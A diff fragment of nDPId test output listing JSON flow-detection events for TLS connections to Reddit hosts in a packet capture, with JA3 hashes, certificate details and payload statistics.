-01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01262{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01261{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01261{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
-01262{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01230{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01230{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01230{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}}
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01260{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01260{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}}
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
